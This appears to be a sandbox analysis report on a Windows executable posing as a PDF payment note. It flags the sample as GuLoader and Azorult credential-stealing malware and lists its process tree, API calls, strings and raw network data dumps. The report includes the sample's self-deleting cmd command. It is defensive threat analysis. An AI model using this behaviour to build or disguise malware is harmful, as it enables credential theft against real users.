fe af ee c2 ab 00 95 52 7f e9 82 1c 7b b8 fd 85 9a 1c ad 64 a7 a5 Data Ascii: %aDFP< =OWfweW[C(0m\|=u:Az8DD@,mGaZe:UfQH('$KJquKCASAjL}%Ruq3@yKVe3TSPQDF3C`YL#ti'\;]Yo_0\|`R{d
2024-09-30 13:10:11 UTC	8000	IN	Data Raw: f6 19 97 b8 25 ab 3d 8d 08 52 05 0b 1b 8a c5 c2 d2 17 00 e7 9a 16 95 68 96 7b fd 64 e9 6e eb 61 52 a6 f8 ac 5e 6e 61 28 7d b3 4e f9 4a e8 94 20 ed 52 fc 07 f7 ad 0c b8 1c 11 f1 3a c5 4b 02 53 15 bc 5b 2e ea 5c 52 20 7d 06 c7 9b 9a 96 3e e0 7d 19 b4 58 0a fe 50 2f ff 2c d2 bc f7 26 47 40 34 9c 0f 82 92 f3 c8 6c 64 5e c8 fc c7 23 b0 1e be 68 71 d7 f7 ba 99 3b 9f 6d 98 5e e9 bf d2 d0 cb 7e f4 fc ec 9e 82 96 72 50 23 7b af 7f 9f 29 9b 12 d6 36 aa b5 f9 3c 16 a9 72 b4 50 b5 77 35 39 9e c4 2a 40 65 26 ab b3 3d cc 8c 0d 23 15 b6 14 bc 52 43 12 9b 45 04 cf 75 79 6c 3b 3e 6f 9b 32 d7 7b d1 7d 7b 11 50 aa 23 f8 4f 8a ab 1e 53 ea 9c be fb 27 de 14 5e 8a c1 c7 73 c2 7a aa 09 55 64 99 5c bd 3a 20 d8 fd 7b 70 a5 32 1f 02 c5 bf 38 99 5b 92 11 e5 93 a3 a1 c6 9b 68 d4 97 Data Ascii: %=Rh{dnaR^na(}NJ R:KS[.\R }>}XP/,&G@4ld^#hq;m^~rP#{)6<rPw59*@e&=#RCEuyl;>o2{}{P#OS'^szUd\: {p28[h
2024-09-30 13:10:11 UTC	8000	IN	Data Raw: 2a 08 d0 eb ab 16 f3 6f 15 09 37 80 f5 84 8f 5a 6f 11 87 c5 bf db 28 0a 2f ee 97 46 aa ca 89 99 1c 7e e7 4d eb 72 a3 92 58 38 65 9e ca 0a b8 fb 3c 26 45 71 88 47 39 d2 0f 5b 05 a0 c5 28 82 c3 02 02 30 2a 1c bd 57 f8 d3 54 e8 a3 20 a7 4e 17 87 58 f5 a2 e7 ec c0 8f 0d bc 43 31 1e 9a 48 be a3 76 83 09 1d ab f0 56 0a 44 4e 1a a2 a8 f9 06 66 c0 04 94 58 f0 fa c4 cd 3d 00 4e 49 6a 25 d9 34 bd f9 3f 4e 1d d6 87 cf 21 0c 21 32 94 32 77 5d e8 16 19 cf 5d 52 f9 ec aa 2e 77 06 d6 17 41 d4 da 8a da b5 a1 e3 26 bc 6b e8 d9 8f ca 9c 79 50 23 64 42 4e 77 ce 4a 19 cb 73 4e 98 7f df d7 83 87 6c a4 ee 86 77 71 35 fa f2 b1 ca 81 37 3c c8 fc 3b 5b a0 87 c4 9f 1c 73 50 c1 0e ed fa 05 6e a6 e9 94 bb 54 3d 21 7f 77 de 15 7d d1 54 52 07 81 9c 9a c0 06 9c fb ef 49 78 e5 57 9e 5a Data Ascii: o7Zo(/F~MrX8e<&EqG9[(0WT NXC1HvVDNfX=NIj%4?N!!22w]]R.wA&kyP#dBNwJsNlwq57<;[sPnT=!w}TRIxWZ
2024-09-30 13:10:11 UTC	8000	IN	Data Raw: 85 60 56 10 26 23 4e 31 d8 73 5d 23 7f bb 93 da b0 75 cf 24 ff ab eb 40 7e 8d 94 ea be 4b 78 4a 60 7f d6 82 9c 5c 04 a7 1a 3a de 82 de 9a 25 07 bc 0e 9f ab f2 b7 63 2c 9f 2a 14 88 4d f2 e2 84 b7 62 96 10 96 c9 31 69 11 c5 dd 71 1a 27 db ca 4e c7 28 98 31 5d e2 40 3b f0 3c 1d d1 2f cc d1 34 5f fc 2e c7 90 df b7 7b 54 d9 2b 46 d3 29 5b 88 27 94 c8 2c 07 ff 9d 6b 01 ee 7e 99 ea b7 59 1b ef c3 32 77 f8 5f 4b de 1b dc ec 5a 83 6d 5c ff 25 97 6a a6 39 67 da d1 10 8b 93 d7 2c ca 5f 44 4c c6 17 f4 32 1b 99 a7 96 46 9a 45 60 18 19 7f 0c 92 bb 6b 6f ae bd 02 ed bf 75 72 df 3d 86 d4 e1 9f 8e cc 80 ad c8 04 f3 9f bf fc e4 eb 1b 5e d8 77 57 94 83 27 a4 e9 aa b8 ec ad a7 14 89 ac 04 17 66 d7 1c c8 60 94 e6 0c 16 e0 b6 76 13 2b ba 28 bd 48 d6 73 e0 fe 66 b5 e9 da cc f3 Data Ascii: `V&#N1s]#u$@~KxJ`\:%c,*Mb1iq'N(1]@;</4_.{T+F)[',k~Y2w_KZm\%j9g,_DL2FE`kour=^wW'f`v+(Hsf

Target ID:	0
Start time:	09:09:28
Start date:	30/09/2024
Path:	C:\Users\user\Desktop\Payment Advice Note_Pdf.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Payment Advice Note_Pdf.exe"
Imagebase:	0x400000
File size:	547'272 bytes
MD5 hash:	6252D288D82FA00E65D3BA32BDC53411
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1305639727.00000000077F5000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	09:09:58
Start date:	30/09/2024
Path:	C:\Users\user\Desktop\Payment Advice Note_Pdf.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Payment Advice Note_Pdf.exe"
Imagebase:	0x400000
File size:	547'272 bytes
MD5 hash:	6252D288D82FA00E65D3BA32BDC53411
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1354418471.00000000053C6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1354012860.00000000053C7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1353774402.00000000053C7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000002.00000002.1404635132.0000000000060000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000002.00000002.1429245765.0000000036590000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.1428296777.0000000036140000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	09:10:20
Start date:	30/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "Payment Advice Note_Pdf.exe"
Imagebase:	0x490000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	09:10:20
Start date:	30/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ec6b0000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	09:10:20
Start date:	30/09/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\timeout.exe 3
Imagebase:	0x760000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	19.5%
Dynamic/Decrypted Code Coverage:	13.6%
Signature Coverage:	24.1%
Total number of Nodes:	1547
Total number of Limit Nodes:	38

Executed Functions

Function 0040326A Relevance: 91.4, APIs: 32, Strings: 20, Instructions: 401
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 0040328C
GetVersion.KERNEL32 ref: 00403292
#17.COMCTL32(00000007,00000009,SETUPAPI,USERENV,UXTHEME), ref: 004032E2
OleInitialize.OLE32(00000000), ref: 004032E9
SHGetFileInfoW.SHELL32(004206C8,00000000,?,000002B4,00000000), ref: 00403305
GetCommandLineW.KERNEL32(00428220,NSIS Error), ref: 0040331A
GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\Payment Advice Note_Pdf.exe",00000000), ref: 0040332D
CharNextW.USER32(00000000,"C:\Users\user\Desktop\Payment Advice Note_Pdf.exe",00000020), ref: 00403354

Part of subcall function 004063F5: GetModuleHandleA.KERNEL32(?,?,00000020,004032D6,00000009,SETUPAPI,USERENV,UXTHEME), ref: 00406407
Part of subcall function 004063F5: GetProcAddress.KERNEL32(00000000,?), ref: 00406422

GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 0040348F
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004034A0
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034AC
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034C0
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004034C8
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004034D9
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004034E1
DeleteFileW.KERNELBASE(1033), ref: 004034F5

Part of subcall function 0040601F: lstrcpynW.KERNEL32(00409300,00409300,00000400,0040331A,00428220,NSIS Error), ref: 0040602C

OleUninitialize.OLE32(?), ref: 004035C0
ExitProcess.KERNEL32 ref: 004035E2
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Payment Advice Note_Pdf.exe",00000000,?), ref: 004035F5
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040926C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Payment Advice Note_Pdf.exe",00000000,?), ref: 00403604
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Payment Advice Note_Pdf.exe",00000000,?), ref: 0040360F
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Payment Advice Note_Pdf.exe",00000000,?), ref: 0040361B
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403637
DeleteFileW.KERNEL32(0041FEC8,0041FEC8,?,user32::EnumWindows(i r2 ,i 0),?), ref: 00403691
CopyFileW.KERNEL32(C:\Users\user\Desktop\Payment Advice Note_Pdf.exe,0041FEC8,00000001), ref: 004036A5
CloseHandle.KERNEL32(00000000,0041FEC8,0041FEC8,?,0041FEC8,00000000), ref: 004036D2
GetCurrentProcess.KERNEL32(00000028,?), ref: 00403701
OpenProcessToken.ADVAPI32(00000000), ref: 00403708
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040371D
AdjustTokenPrivileges.ADVAPI32 ref: 00403740
ExitWindowsEx.USER32(00000002,80040002), ref: 00403765
ExitProcess.KERNEL32 ref: 00403788

Strings

"C:\Users\user\Desktop\Payment Advice Note_Pdf.exe", xrefs: 00403320, 00403326, 0040351D
C:\Users\user\AppData\Local\Temp\, xrefs: 00403484, 00403489, 0040349F, 004034AB, 004034BA, 004034C7, 004034D3, 004034DB, 004035F2, 00403603, 0040360E, 0040361A, 00403627, 00403636, 004036E7
SETUPAPI, xrefs: 004032C5
1033, xrefs: 004034F0
C:\Users\user\Desktop, xrefs: 00403614, 00403619, 00403646
user32::EnumWindows(i r2 ,i 0), xrefs: 00403655
.tmp, xrefs: 00403609
TEMP, xrefs: 004034D4
\Temp, xrefs: 004034A6
Low, xrefs: 004034C2
SeShutdownPrivilege, xrefs: 00403717
USERENV, xrefs: 004032BB
Error launching installer, xrefs: 00403577
~nsu, xrefs: 004035ED
C:\Users\user\toenailed\quoteworthy\Atoning, xrefs: 00403472, 00403592, 0040363D, 00403647
C:\Users\user\Desktop\Payment Advice Note_Pdf.exe, xrefs: 004036A0
TMP, xrefs: 004034DC
NSIS Error, xrefs: 0040330B
C:\Users\user\toenailed\quoteworthy\Atoning, xrefs: 0040359D
UXTHEME, xrefs: 004032B1

Memory Dump Source

Source File: 00000000.00000002.1303817138.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1303789428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303870127.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1304115213.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpyn
String ID: "C:\Users\user\Desktop\Payment Advice Note_Pdf.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Payment Advice Note_Pdf.exe$C:\Users\user\toenailed\quoteworthy\Atoning$C:\Users\user\toenailed\quoteworthy\Atoning$Error launching installer$Low$NSIS Error$SETUPAPI$SeShutdownPrivilege$TEMP$TMP$USERENV$UXTHEME$\Temp$user32::EnumWindows(i r2 ,i 0)$~nsu
API String ID: 3586999533-3003046064
Opcode ID: fda6c057a4537dba88034d229a92b30a1776572ee97949e398e0e99b98fea1a3
Instruction ID: 47b2dd04bf5340fec55df09ad24e258ddf9dfe897e1895205e314fce2ef220c4
Opcode Fuzzy Hash: fda6c057a4537dba88034d229a92b30a1776572ee97949e398e0e99b98fea1a3
Instruction Fuzzy Hash: 08D12770604200BAD720BF659D49A3B3AACEB4170AF50487FF441B61D2DB7D9941CB6E

Function 004052BD Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 0040531B
GetDlgItem.USER32(?,000003EE), ref: 0040532A
GetClientRect.USER32(?,?), ref: 00405367
GetSystemMetrics.USER32(00000002), ref: 0040536E
SendMessageW.USER32(?,00001061,00000000,?), ref: 0040538F
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053A0
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053B3
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053C1
SendMessageW.USER32(?,00001024,00000000,?), ref: 004053D4
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004053F6
ShowWindow.USER32(?,00000008), ref: 0040540A
GetDlgItem.USER32(?,000003EC), ref: 0040542B
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040543B
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405454
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405460
GetDlgItem.USER32(?,000003F8), ref: 00405339

Part of subcall function 00404118: SendMessageW.USER32(00000028,?,00000001,00403F44), ref: 00404126

GetDlgItem.USER32(?,000003EC), ref: 0040547D
CreateThread.KERNELBASE(00000000,00000000,Function_00005251,00000000), ref: 0040548B
CloseHandle.KERNELBASE(00000000), ref: 00405492
ShowWindow.USER32(00000000), ref: 004054B6
ShowWindow.USER32(?,00000008), ref: 004054BB
ShowWindow.USER32(00000008), ref: 00405505
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405539
CreatePopupMenu.USER32 ref: 0040554A
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040555E
GetWindowRect.USER32(?,?), ref: 0040557E
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405597
SendMessageW.USER32(?,00001073,00000000,?), ref: 004055CF
OpenClipboard.USER32(00000000), ref: 004055DF
EmptyClipboard.USER32 ref: 004055E5
GlobalAlloc.KERNEL32(00000042,00000000), ref: 004055F1
GlobalLock.KERNEL32(00000000), ref: 004055FB
SendMessageW.USER32(?,00001073,00000000,?), ref: 0040560F
GlobalUnlock.KERNEL32(00000000), ref: 0040562F
SetClipboardData.USER32(0000000D,00000000), ref: 0040563A
CloseClipboard.USER32 ref: 00405640

Strings

{, xrefs: 00405523

Memory Dump Source

Source File: 00000000.00000002.1303817138.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1303789428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303870127.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1304115213.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: 9a77c187b3bdb174f00390ba451f34319fb4fcb0300480dddaf98d88a99026f5
Instruction ID: 3cf410e3b9716a944c4f9a47a0d896a4f96f7db2f8ccf501d1eae2c46102dad2
Opcode Fuzzy Hash: 9a77c187b3bdb174f00390ba451f34319fb4fcb0300480dddaf98d88a99026f5
Instruction Fuzzy Hash: 85B13A71900208FFDB21AF60DD85AAE7B79FB44355F40803AFA01BA1A0C7755E52DF69

Function 00403868 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004063F5: GetModuleHandleA.KERNEL32(?,?,00000020,004032D6,00000009,SETUPAPI,USERENV,UXTHEME), ref: 00406407
Part of subcall function 004063F5: GetProcAddress.KERNEL32(00000000,?), ref: 00406422

lstrcatW.KERNEL32(1033,00422708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422708,00000000,00000002,763C3420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\Payment Advice Note_Pdf.exe"), ref: 004038E9
lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\toenailed\quoteworthy\Atoning,1033,00422708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422708,00000000,00000002,763C3420), ref: 00403969
lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\toenailed\quoteworthy\Atoning,1033,00422708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422708,00000000), ref: 0040397C
GetFileAttributesW.KERNEL32(Call), ref: 00403987
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\toenailed\quoteworthy\Atoning), ref: 004039D0

Part of subcall function 00405F66: wsprintfW.USER32 ref: 00405F73

RegisterClassW.USER32(004281C0), ref: 00403A0D
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A25
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A5A
ShowWindow.USER32(00000005,00000000), ref: 00403A90
GetClassInfoW.USER32(00000000,RichEdit20W,004281C0), ref: 00403ABC
GetClassInfoW.USER32(00000000,RichEdit,004281C0), ref: 00403AC9
RegisterClassW.USER32(004281C0), ref: 00403AD2
DialogBoxParamW.USER32(?,00000000,00403C0B,00000000), ref: 00403AF1

Strings

"C:\Users\user\Desktop\Payment Advice Note_Pdf.exe", xrefs: 0040386B
RichEdit, xrefs: 00403AC3
C:\Users\user\AppData\Local\Temp\, xrefs: 0040386D
1033, xrefs: 00403888, 004038E4
.exe, xrefs: 00403976
Call, xrefs: 00403930, 00403939, 00403947, 00403996, 0040399C
RichEdit20W, xrefs: 00403AB4, 00403ABA
RichEd20, xrefs: 00403A96
.DEFAULT\Control Panel\International, xrefs: 004038D4
Control Panel\Desktop\ResourceLocale, xrefs: 0040389C
C:\Users\user\toenailed\quoteworthy\Atoning, xrefs: 004038F8, 00403900, 004039A3, 004039A9, 004039B9
_Nb, xrefs: 004039EC, 00403A54
RichEd32, xrefs: 00403AA4

Memory Dump Source

Source File: 00000000.00000002.1303817138.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1303789428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303870127.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1304115213.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\Payment Advice Note_Pdf.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\toenailed\quoteworthy\Atoning$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-4095224949
Opcode ID: db80b2588597b3e26acc2e4c4de499a3f9846f615b8d16b47e4426e139c46013
Instruction ID: 2be98759588b12f3ea5babf1b6ec1a1322f2c31473ef1d4f92accd895ea03b39
Opcode Fuzzy Hash: db80b2588597b3e26acc2e4c4de499a3f9846f615b8d16b47e4426e139c46013
Instruction Fuzzy Hash: C861A670644200BAD220AF669D45F3B3A6CEB84749F80457FF941B22E2CB7C6D01CA7E

Function 00406041 Relevance: 23.0, APIs: 8, Strings: 5, Instructions: 207
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersion.KERNEL32(00000000,Skipped: C:\Users\user\AppData\Local\Temp\nseEFF9.tmp\System.dll,?,004051B5,Skipped: C:\Users\user\AppData\Local\Temp\nseEFF9.tmp\System.dll,00000000,00000000,0040FEC0), ref: 00406104
GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00406182
GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 00406195
SHGetSpecialFolderLocation.SHELL32(?,?), ref: 004061D1
SHGetPathFromIDListW.SHELL32(?,Call), ref: 004061DF
CoTaskMemFree.OLE32(?), ref: 004061EA
lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040620E
lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nseEFF9.tmp\System.dll,?,004051B5,Skipped: C:\Users\user\AppData\Local\Temp\nseEFF9.tmp\System.dll,00000000,00000000,0040FEC0), ref: 00406268

Strings

\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406208
Call, xrefs: 0040606B, 0040614B, 0040616C, 00406181, 00406194, 004061B0, 004061DB, 0040620D, 00406213, 0040622D, 00406241, 00406261, 00406267, 00406273, 004062A6
Skipped: C:\Users\user\AppData\Local\Temp\nseEFF9.tmp\System.dll, xrefs: 00406066
user32::EnumWindows(i r2 ,i 0), xrefs: 0040623B
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406150

Memory Dump Source

Source File: 00000000.00000002.1303817138.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1303789428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303870127.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1304115213.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nseEFF9.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$user32::EnumWindows(i r2 ,i 0)
API String ID: 900638850-732415316
Opcode ID: 2cf121e3e7616b5f5fc1bd3774cadb37834e6b4aa39da4076735cc4ba433a86e
Instruction ID: fd30239bcabdd6b9b5dacf38e9278243e7343c89492a0aeb8152419411716c6f
Opcode Fuzzy Hash: 2cf121e3e7616b5f5fc1bd3774cadb37834e6b4aa39da4076735cc4ba433a86e
Instruction Fuzzy Hash: 70614771A00101ABDF209F64CC40AAE37A5AF51314F12817FE916BA2D1D73D89A2CB5E

Function 00405810 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNELBASE(?,?,763C3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Payment Advice Note_Pdf.exe"), ref: 00405839
lstrcatW.KERNEL32(00424710,\*.*,00424710,?,?,763C3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Payment Advice Note_Pdf.exe"), ref: 00405881
lstrcatW.KERNEL32(?,00409014,?,00424710,?,?,763C3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Payment Advice Note_Pdf.exe"), ref: 004058A4
lstrlenW.KERNEL32(?,?,00409014,?,00424710,?,?,763C3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Payment Advice Note_Pdf.exe"), ref: 004058AA
FindFirstFileW.KERNEL32(00424710,?,?,?,00409014,?,00424710,?,?,763C3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Payment Advice Note_Pdf.exe"), ref: 004058BA
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,00409300,0000002E), ref: 0040595A
FindClose.KERNEL32(00000000), ref: 00405969

Strings

"C:\Users\user\Desktop\Payment Advice Note_Pdf.exe", xrefs: 00405819
